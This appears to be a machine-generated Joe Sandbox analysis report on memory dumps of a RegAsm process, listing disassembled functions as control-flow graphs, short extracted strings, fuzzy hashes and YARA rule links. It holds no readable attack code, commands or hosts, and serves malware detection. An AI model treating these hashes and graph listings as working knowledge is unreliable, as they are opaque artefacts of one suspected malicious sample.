                                      control_flow_graph 0 6684a18-6684a43 1 6684a4a-6684ad4 0->1 2 6684a45 0->2 7 6684c0f-6684c3b 1->7 2->1 10 6684ad9-6684b1f 7->10 11 6684c41-6684c65 7->11 71 6684b22 call 6686098 10->71 72 6684b22 call 6686089 10->72 14 6684c72-6684c83 11->14 15 6684c67-6684c70 11->15 17 6684c89-6684c96 14->17 15->17 18 6684c9c-6684cb5 17->18 19 6684f84-6684fbf 17->19 27 6684f46-6684f56 18->27 41 6684fd9-6684fde 19->41 42 6684fc1-6684fd4 19->42 21 6684b28-6684b2f 23 6684b31-6684b32 21->23 24 6684b37-6684b5a call 6684468 21->24 26 6684c0c 23->26 32 6684b5f-6684b60 24->32 26->7 34 6684cba-6684db7 27->34 35 6684f5c-6684f76 27->35 32->26 52 6684dc8-6684ded 34->52 53 6684db9-6684dc6 34->53 38 6684f78 35->38 39 6684f81-6684f82 35->39 38->39 39->19 41->19 54 6684df3-6684e41 call 66841a8 52->54 53->54 60 6684e43-6684e92 54->60 61 6684e97-6684ee9 54->61 60->27 61->27 66 6684eeb-6684f3b 61->66 66->27 70 6684f41 call 6684468 66->70 70->27 71->21 72->21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: P-_q$P-_q$P-_q$P-_q$P-_q$P-_q$P-_q
                                      • API String ID: 0-442811482
                                      • Opcode ID: 8d5ca65b7ebce55b43df54ed30b8ce55e3e5a3100ee140554c3553540b9c6ec1
                                      • Instruction ID: e11ce9921120ee3609398fa131833eb04a8f7ba967e871d99c9a161ff8750c1b
                                      • Opcode Fuzzy Hash: 8d5ca65b7ebce55b43df54ed30b8ce55e3e5a3100ee140554c3553540b9c6ec1
                                      • Instruction Fuzzy Hash: 70F19F74D01219CFDB64DFA4D944ADDBBB2FF89300F2081A9E919A7350DB319A96CF50
                                      Function 066024E8 Relevance: 4.6, Strings: 3, Instructions: 873COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 875 66024e8-660250e 880 6602515-6602539 875->880 882 6602587-6602588 880->882 883 660253c-6602562 880->883 882->880 884 6602589-6602597 882->884 890 6602564-6602569 883->890 891 660256a-660256d 883->891 1179 6602599 call 6603298 884->1179 1180 6602599 call 66031d8 884->1180 1181 6602599 call 66031ca 884->1181 886 660259f-66025b8 893 66025ba-66025c0 886->893 890->891 891->893 894 660256f-6602586 891->894 1186 66025c0 call 66032a8 893->1186 1187 66025c0 call 6603298 893->1187 894->882 896 66025c4-66025cd 897 66025d3-66025e7 896->897 898 6603195-66031ba 896->898 901 6602634-6602645 897->901 902 66025e9-6602620 897->902 919 66031bf-66031c6 898->919 906 6602665-6602676 901->906 907 6602647-6602660 901->907 1188 6602622 call 133c2e1 902->1188 1189 6602622 call 133c2f0 902->1189 914 6602678-66026a6 906->914 915 66026ab-66026bc 906->915 907->919 914->919 923 66026be-66026ca 915->923 924 66026cf-66026e0 915->924 921 6602627-660262f 921->919 923->919 929 66026e2-66026e8 924->929 930 660271d-660272e 924->930 929->898 932 66026ee-66026f4 929->932 936 6602730-6602736 930->936 937 6602767-6602778 930->937 932->898 933 66026fa-6602718 932->933 933->919 936->898 939 660273c-6602742 936->939 943 66027a3-66027b4 937->943 944 660277a-6602780 937->944 939->898 941 6602748-6602762 939->941 941->919 950 66027ba-6602809 943->950 951 660286e-660287f 943->951 944->898 946 6602786-660279e 944->946 946->919 950->898 979 660280f-660283b call 66023cc 950->979 957 6602881-6602887 951->957 958 660289d-66028ae 951->958 957->898 959 660288d-6602898 957->959 964 66028b0-66028b6 958->964 965 66028cf-66028e0 958->965 959->919 964->898 967 66028bc-66028ca 964->967 972 66028e2-66028f4 965->972 973 66028f9-660290a 965->973 967->919 972->919 977 6602923-6602934 973->977 978 660290c-660291e 973->978 983 6602936-6602948 977->983 984 660294d-660295e 977->984 978->919 979->898 998 6602841-6602869 call 66023dc 979->998 983->919 989 6602980-6602991 984->989 990 6602960-6602966 984->990 996 6602997-6602a03 989->996 997 6602a1e-6602a2f 989->997 990->898 991 660296c-660297b 990->991 991->919 996->898 1030 6602a09-6602a19 996->1030 1004 6602a31-6602a3e 997->1004 1005 6602a59-6602a6a 997->1005 998->919 1004->919 1010 6602a70-6602adc 1005->1010 1011 6602af7-6602b08 1005->1011 1010->898 1049 6602ae2-6602af2 1010->1049 1018 6602b32-6602b43 1011->1018 1019 6602b0a-6602b17 1011->1019 1025 6602b45-6602b65 1018->1025 1026 6602b6a-6602b7b 1018->1026 1019->919 1025->919 1032 6602b81-6602c31 1026->1032 1033 6602c36-6602c47 1026->1033 1030->919 1032->919 1041 6602d80-6602d91 1033->1041 1042 6602c4d-6602c53 1033->1042 1051 6602da3-6602db4 1041->1051 1052 6602d93-6602d9e 1041->1052 1043 6602ce8-6602d7b 1042->1043 1044 6602c59-6602c5f 1042->1044 1043->919 1044->1043 1047 6602c65-6602ce3 1044->1047 1047->919 1049->919 1060 6602e21-6602e32 1051->1060 1061 6602db6-6602dca 1051->1061 1052->919 1071 6602e34-6602e3a 1060->1071 1072 6602e76-6602e87 1060->1072 1061->898 1070 6602dd0 1061->1070 1177 6602dd3 call 66038a8 1070->1177 1178 6602dd3 call 660389a 1070->1178 1071->898 1073 6602e40-6602e50 1071->1073 1080 6602ec6-6602ed7 1072->1080 1081 6602e89-6602ec1 1072->1081 1073->898 1087 6602e56-6602e59 1073->1087 1078 6602dd9-6602ddb 1082 6602e00-6602e1c 1078->1082 1083 6602ddd-6602df4 1078->1083 1093 6602ed9-6602ee5 1080->1093 1094 6602eea-6602efb 1080->1094 1081->919 1082->919 1190 6602df6 call 133c2e1 1083->1190 1191 6602df6 call 133c2f0 1083->1191 1175 6602e5b call 6603b70 1087->1175 1176 6602e5b call 6603b80 1087->1176 1093->919 1094->919 1108 6602f01-6602f08 1094->1108 1097 6602e61 1182 6602e63 call 6603c30 1097->1182 1183 6602e63 call 6603c22 1097->1183 1101 6602dfb 1101->919 1106 6602e69 1184 6602e6b call 6605660 1106->1184 1185 6602e6b call 6605670 1106->1185 1112 6602f0a-6602f1b 1108->1112 1113 6602f2e-660316d call 66023ec call 66023fc call 660240c call 660241c call 660242c call 66023fc call 660240c call 660243c call 660244c 1108->1113 1111 6602e71 1111->919 1112->1113 1113->919 1175->1097 1176->1097 1177->1078 1178->1078 1179->886 1180->886 1181->886 1182->1106 1183->1106 1184->1111 1185->1111 1186->896 1187->896 1188->921 1189->921 1190->1101 1191->1101
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Te^q$kKl^${Kl^
                                      • API String ID: 0-3288701447
                                      • Opcode ID: 0587ed22ad091972f09b5e94e1b87f42ef78313783bcccba4455f0fa5cab1f60
                                      • Instruction ID: 74e1d4d1b6024533af67eeb2557de41d2b2f8043bb7857111bf75f185951b5a5
                                      • Opcode Fuzzy Hash: 0587ed22ad091972f09b5e94e1b87f42ef78313783bcccba4455f0fa5cab1f60
                                      • Instruction Fuzzy Hash: E662C131B002118FEB59EF78D868B2E77A7AF88304F108569D406AB3D9DF31DC568B85
                                      Function 06681010 Relevance: 2.0, Strings: 1, Instructions: 746COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \;^q
                                      • API String ID: 0-2342212615
                                      • Opcode ID: 18e24af527a33d4410aac97a57548d43227cbd5051b2ba84a0f5e36d8c19571c
                                      • Instruction ID: 4ca9c131a38e2d13b6454667fca864deb6bc882cedd84c0d030ddfcee919ce06
                                      • Opcode Fuzzy Hash: 18e24af527a33d4410aac97a57548d43227cbd5051b2ba84a0f5e36d8c19571c
                                      • Instruction Fuzzy Hash: 0492AF74D00269CFDB65DF68C9547D8BBB2BF4A301F1086EAE509A7250EB31AAC5CF50
                                      Function 06680FFF Relevance: 1.7, Strings: 1, Instructions: 412COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \;^q
                                      • API String ID: 0-2342212615
                                      • Opcode ID: 5dfa9aba519f29c15b0d1e859024ecfdb21d72ec4b25ab4ee09275de6c3a1681
                                      • Instruction ID: f8d4e580c4c9cf71ff79a1c6430b0da486b09ecb6e96ca96415c31cfd42f2b8f
                                      • Opcode Fuzzy Hash: 5dfa9aba519f29c15b0d1e859024ecfdb21d72ec4b25ab4ee09275de6c3a1681
                                      • Instruction Fuzzy Hash: 8E22B074900269CFDB65DF68C854BD9BBB2BF4A301F1081E9E849AB250DB359EC6CF50
                                      Function 06661498 Relevance: .8, Instructions: 826COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1e37b7dba03445e7662767cf94833074c4207cd1947a1ba5c9ed328ac1cee714
                                      • Instruction ID: b5ff56b13e1cdcbaa5b5dc86ff296bad94115f07fae2b5816ad9b2435353dd84
                                      • Opcode Fuzzy Hash: 1e37b7dba03445e7662767cf94833074c4207cd1947a1ba5c9ed328ac1cee714
                                      • Instruction Fuzzy Hash: F4929074D01229CFCB64DF69C994ADDB7B1BF89304F5086EAD409A7264EB30AE85CF41
                                      Function 06605670 Relevance: .6, Instructions: 606COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee37d444887aa09ce2baf93961c466f64b047c7a8ce03aca17ccc8419c862e7c
                                      • Instruction ID: cf43a03e027313bc8bb32077f6990fa6afdcad48388fd8ed5a8721e2e4262a0d
                                      • Opcode Fuzzy Hash: ee37d444887aa09ce2baf93961c466f64b047c7a8ce03aca17ccc8419c862e7c
                                      • Instruction Fuzzy Hash: 60226E70B002059FEB58EF79D998B6AB6E7BBC4700F148428E40A9B3D8DF75DC458B94
                                      Function 0666B408 Relevance: .4, Instructions: 428COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d599035b001198a0ddfd1f4432fbb61309c5cb45809d8bb10136df26d5149448
                                      • Instruction ID: 326cc06151622c2458f4c78e172693c4849714a9bfa482cae702fe67d995405a
                                      • Opcode Fuzzy Hash: d599035b001198a0ddfd1f4432fbb61309c5cb45809d8bb10136df26d5149448
                                      • Instruction Fuzzy Hash: 9632C274E00228CFDB54DFA5D998A9DBBB2FF49301F1085A9E90AAB354DB709D85CF40
                                      Function 0666DB20 Relevance: .4, Instructions: 407COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a4fad3a54f69ce74ea295df0412f915eb556c91844c3d2d72a2980a38a2d56c
                                      • Instruction ID: acb3e29fb18bcdb2562d8ed5372370fb39a339d965e8d93e2235090d9e1d0d0b
                                      • Opcode Fuzzy Hash: 1a4fad3a54f69ce74ea295df0412f915eb556c91844c3d2d72a2980a38a2d56c
                                      • Instruction Fuzzy Hash: 17225E74E002298FDB64DF69D984BDDBBB6BF49300F1081E9E909A7260DB319E85CF51
                                      Function 06660040 Relevance: .4, Instructions: 372COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec83e0e7113b755db12d87553eb33e803ea482c58af4c1b087ace68d87eef8f7
                                      • Instruction ID: 785ddd9a2267cf2282e062869944ba1a2fe7c0726461979eae20b232a421b22b
                                      • Opcode Fuzzy Hash: ec83e0e7113b755db12d87553eb33e803ea482c58af4c1b087ace68d87eef8f7
                                      • Instruction Fuzzy Hash: 4A02BF74E01218CFDB68CF6AD984B9DBBF2BF89300F1481A9D509A7365DB349A85CF50
                                      Function 06661488 Relevance: .3, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 622931f737909515bce0d5aed466695d5454d9eb687dfb10a90edd17e0bdada3
                                      • Instruction ID: a5193af7d60c69390cf8e6efdda6e626a61be4656972b291898915d8aaf6120f
                                      • Opcode Fuzzy Hash: 622931f737909515bce0d5aed466695d5454d9eb687dfb10a90edd17e0bdada3
                                      • Instruction Fuzzy Hash: CEE1E571D1076ACBCB24EF65C9906DDB7B1BF9A300F5086AAD40977264EB30AAC5CF41
                                      Function 0666B3F8 Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2074c4059f4fb751752735dfde8aad76067782cc94d680a056713282667bd006
                                      • Instruction ID: 50c290facf91eb1434254ef2f00de2a0208effe8c17e875b6d62e7cd3996b8c7
                                      • Opcode Fuzzy Hash: 2074c4059f4fb751752735dfde8aad76067782cc94d680a056713282667bd006
                                      • Instruction Fuzzy Hash: 06E1D574E00218CFDB54DFA9D994A9DBBB2FF49301F1181A9D90AAB354DB70AD86CF40
                                      Function 066882D8 Relevance: .2, Instructions: 232COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4db6ffeab79bc6f7fe505b9708871c5b46d854b1c38c1d913126f6a302e2db01
                                      • Instruction ID: db3f79f680db69ca2e29ca587482033c0375193927de51b73d051446bb088d79
                                      • Opcode Fuzzy Hash: 4db6ffeab79bc6f7fe505b9708871c5b46d854b1c38c1d913126f6a302e2db01
                                      • Instruction Fuzzy Hash: 49B1A174E00219CFCB54DFA9D984A9DBBF2FF89300F1081A9E819AB365DB309985CF51
                                      Function 066882CA Relevance: .2, Instructions: 227COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba6c30de8ff894b29c956e1eaa8e52b2b9b60e19c540c15e80bef85112e1f183
                                      • Instruction ID: 2c8f7b4b484213c2ea324468f05f9fb1009104bd593b03bf5bace524c4088468
                                      • Opcode Fuzzy Hash: ba6c30de8ff894b29c956e1eaa8e52b2b9b60e19c540c15e80bef85112e1f183
                                      • Instruction Fuzzy Hash: B9B1A174E00219CFCB54DFA9D984A9DBBF2BF49300F1081A9E419AB365DB349D85CF51
                                      Function 06681D48 Relevance: .2, Instructions: 192COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eaf024d1f20f0b4024f7af4cbad9e7a2ab4e1ffb6b7578023a38c464fe09e0f5
                                      • Instruction ID: b2138920fb9c2a07adbfee0d37bfad546dfbc0308932013e45119eb8c1bc4d8c
                                      • Opcode Fuzzy Hash: eaf024d1f20f0b4024f7af4cbad9e7a2ab4e1ffb6b7578023a38c464fe09e0f5
                                      • Instruction Fuzzy Hash: F3818D74E00219CFDB54DFA9D584A9DFBF2BF89311F14812AE419AB364DB30A942CF50
                                      Function 0666F558 Relevance: .2, Instructions: 154COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 896ea6ce687ca56018e47f95d535abc1a4d756d81bcca07cc727bd7469b25857
                                      • Instruction ID: fa6326222078bf5f1b936dfcffd3f23da8f5a247f8b5fcccc26a9399ed275549
                                      • Opcode Fuzzy Hash: 896ea6ce687ca56018e47f95d535abc1a4d756d81bcca07cc727bd7469b25857
                                      • Instruction Fuzzy Hash: 2671B374E00228DFEBA4DF6AE844B9DBBF2BF89300F1081A9D459A7351DB305A85CF51
                                      Function 06660022 Relevance: .1, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660390795.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6660000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 215dc086d17d403fca7ad75888da391993ce2f57d4ea8a4f52d7778846eaa4f8
                                      • Instruction ID: ffd4d3a39e599bfd5e0c794f05600e42e07fddcd9aa4218dcbb76af813f33721
                                      • Opcode Fuzzy Hash: 215dc086d17d403fca7ad75888da391993ce2f57d4ea8a4f52d7778846eaa4f8
                                      • Instruction Fuzzy Hash: F15175B1D016189BEB58CF6BD94478EFAF3AFC9310F14C1AAD408AB265EB740946CF51
                                      Function 06684A08 Relevance: .1, Instructions: 121COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cebaa5b1e59ba48a9fa8217925f542127652092ff34f20a6ce9fcfa33f7c46f0
                                      • Instruction ID: 50ef9101e93ad4ec5c472894663eda7d90f51ddf15fbd2faea2c480a68627017
                                      • Opcode Fuzzy Hash: cebaa5b1e59ba48a9fa8217925f542127652092ff34f20a6ce9fcfa33f7c46f0
                                      • Instruction Fuzzy Hash: 0A51E370D01219CFEB68DFA6D944A9DBBF6FF88300F208169E819AB251DB315986CF50
                                      Function 066849D8 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3d2d98640bebceb0a5f8447488d3996cbf9a3446318ef084c084dc875faf182
                                      • Instruction ID: d64f85d739f081ad3a4092e3299b5df55a4f30f68d9024247f52777268833fd9
                                      • Opcode Fuzzy Hash: b3d2d98640bebceb0a5f8447488d3996cbf9a3446318ef084c084dc875faf182
                                      • Instruction Fuzzy Hash: 4C51F570D05209CFDB68DFA6D944A9DBBF6FF88301F2081A9E819A7351DB355981CF50
                                      Function 06603C30 Relevance: 6.5, Strings: 5, Instructions: 216COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 460 6603c30-6603ce3 472 6603ce9-6603cf0 460->472 473 6603f1a-6603f23 460->473 472->473 474 6603cf6-6603cfd 472->474 477 6603f25-6603f32 473->477 478 6603f3a 473->478 474->473 476 6603d03-6603d22 474->476 482 6603d24-6603d28 476->482 483 6603d5c-6603d8a 476->483 477->478 479 6603f3b 478->479 479->479 482->473 484 6603d2e-6603d59 482->484 491 6603d8c 483->491 492 6603d8e-6603d9a 483->492 484->483 493 6603d9c-6603dd3 call 660245c 491->493 492->493 501 6603ed6 493->501 502 6603dd9-6603ddb 493->502 503 6603edb 501->503 504 6603de5-6603e53 502->504 505 6603ee0-6603ee4 503->505 504->503 518 6603e59-6603e60 504->518 506 6603ee6-6603ef3 505->506 507 6603efb-6603efc 505->507 506->507 507->473 518->503 519 6603e62-6603e69 518->519 519->503 520 6603e6b-6603e8a 519->520 522 6603e8c-6603e90 520->522 523 6603e9d-6603ea1 520->523 522->503 524 6603e92-6603e9a 522->524 525 6603eb1-6603ed4 523->525 526 6603ea3-6603ea7 523->526 524->523 525->505 526->503 527 6603ea9 526->527 527->525
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PH^q$PH^q$Te^q$XX^q$XX^q
                                      • API String ID: 0-427891639
                                      • Opcode ID: 33abe74edf2dec34bcba72c48873ebf288535352785c1ff8b3426d15af2541ec
                                      • Instruction ID: f6ab1b375990423f3f33ca63821ab13bb98e3219855d62d87999b2e35b87c406
                                      • Opcode Fuzzy Hash: 33abe74edf2dec34bcba72c48873ebf288535352785c1ff8b3426d15af2541ec
                                      • Instruction Fuzzy Hash: FA71A370F002469BEB289B79D49876FBAE7BBC4300F24C82DD056AB3D8DE759C458791
                                      Function 06686B80 Relevance: 5.7, Strings: 4, Instructions: 706COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 636 6686b80-6686bb1 637 6686bb8-6686c0b 636->637 638 6686bb3 636->638 642 6686c11-6686c35 637->642 643 6686ca4-6686cad 637->643 638->637 646 6686c91-6686ca2 642->646 647 6686c37-6686c8f 642->647 644 6686cb4-6686cd6 643->644 649 6686cdc-6686e1c 644->649 650 6686e91-6686ec5 644->650 646->644 647->644 708 6686e1e-6686e63 649->708 709 6686e65-6686e73 649->709 660 6686ecb-6686f25 650->660 661 6687135-6687177 650->661 674 6686f6f-6686f9c 660->674 675 6686f27-6686f54 660->675 671 668747c-66874b8 661->671 672 668717d-66871aa 661->672 693 66877db-66877e6 671->693 694 66874be-66874dc 671->694 683 66871ac 672->683 684 66871b1-6687213 672->684 686 6686fa4-6686ff4 674->686 681 6686f5b-6686f6d 675->681 682 6686f56 675->682 681->686 682->681 683->684 714 668726c-6687301 684->714 715 6687215-6687266 684->715 706 6687036-6687062 686->706 707 6686ff6-668702b 686->707 697 66877ed-668781c 693->697 703 66874de 694->703 704 66874e3-6687538 694->704 723 668781e-6687844 697->723 724 6687890-6687897 697->724 703->704 747 66875de-6687667 704->747 748 668753e-66875d3 704->748 731 66870bd-6687130 706->731 732 6687064-66870b5 706->732 707->706 711 6686e79-6686e8c 708->711 709->711 711->697 740 668730c-668735d 714->740 715->714 715->740 794 6687847 call 66882d8 723->794 795 6687847 call 66882ca 723->795 731->697 732->731 739 668784d-6687854 739->724 743 6687856-6687885 739->743 760 6687403-6687477 740->760 761 6687363-66873f8 740->761 743->724 772 668766d-66876c5 747->772 773 6687702-66877d9 747->773 748->747 760->697 761->760 772->773 788 66876c7-66876fd 772->788 773->697 788->697 794->739 795->739
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660465622.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6680000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pl^q$Pl^q$Pl^q$Pl^q
                                      • API String ID: 0-3823100048
                                      • Opcode ID: 0baa2134c2345bada187ab57ff20b338e7f90b1edf4d823f22c171196d45af32
                                      • Instruction ID: b393c74fa41c913ad1edefad634514e209ebd37c8fa50d0448c5f83eeeb88463
                                      • Opcode Fuzzy Hash: 0baa2134c2345bada187ab57ff20b338e7f90b1edf4d823f22c171196d45af32
                                      • Instruction Fuzzy Hash: C7826274A012298FDB64DF69C984BDDBBB1BF49300F1081EAD909A7365DB319E85CF80
                                      Function 06603C22 Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1780 6603c22-6603c25 1781 6603c86-6603ce3 1780->1781 1782 6603c27-6603c84 1780->1782 1793 6603ce9-6603cf0 1781->1793 1794 6603f1a-6603f23 1781->1794 1782->1781 1793->1794 1795 6603cf6-6603cfd 1793->1795 1798 6603f25-6603f32 1794->1798 1799 6603f3a 1794->1799 1795->1794 1797 6603d03-6603d22 1795->1797 1803 6603d24-6603d28 1797->1803 1804 6603d5c-6603d8a 1797->1804 1798->1799 1800 6603f3b 1799->1800 1800->1800 1803->1794 1805 6603d2e-6603d59 1803->1805 1812 6603d8c 1804->1812 1813 6603d8e-6603d9a 1804->1813 1805->1804 1814 6603d9c-6603dd3 call 660245c 1812->1814 1813->1814 1822 6603ed6 1814->1822 1823 6603dd9-6603ddb 1814->1823 1824 6603edb 1822->1824 1825 6603de5-6603e53 1823->1825 1826 6603ee0-6603ee4 1824->1826 1825->1824 1839 6603e59-6603e60 1825->1839 1827 6603ee6-6603ef3 1826->1827 1828 6603efb-6603efc 1826->1828 1827->1828 1828->1794 1839->1824 1840 6603e62-6603e69 1839->1840 1840->1824 1841 6603e6b-6603e8a 1840->1841 1843 6603e8c-6603e90 1841->1843 1844 6603e9d-6603ea1 1841->1844 1843->1824 1845 6603e92-6603e9a 1843->1845 1846 6603eb1-6603ed4 1844->1846 1847 6603ea3-6603ea7 1844->1847 1845->1844 1846->1826 1847->1824 1848 6603ea9 1847->1848 1848->1846
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2660241348.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_6600000_RegAsm.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PH^q$Te^q$XX^q
                                      • API String ID: 0-3793896909
                                      • Opcode ID: 0e6a221264767c4cb60787b25ee03a2aab51207518dbe4cde808e1456fc93a54
                                      • Instruction ID: 9296f63426e33a050d55324f3098df2a57d1c10dd195ce5cdcba7d7bb56f1d2d
                                      • Opcode Fuzzy Hash: 0e6a221264767c4cb60787b25ee03a2aab51207518dbe4cde808e1456fc93a54
                                      • Instruction Fuzzy Hash: B871C470F002069BE728DB79D49876FBAE7BBC4300F24C92DD05AAB3D8CA759C458791
                                      Function 06600040 Relevance: 3.2, Strings: 2, Instructions: 702COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
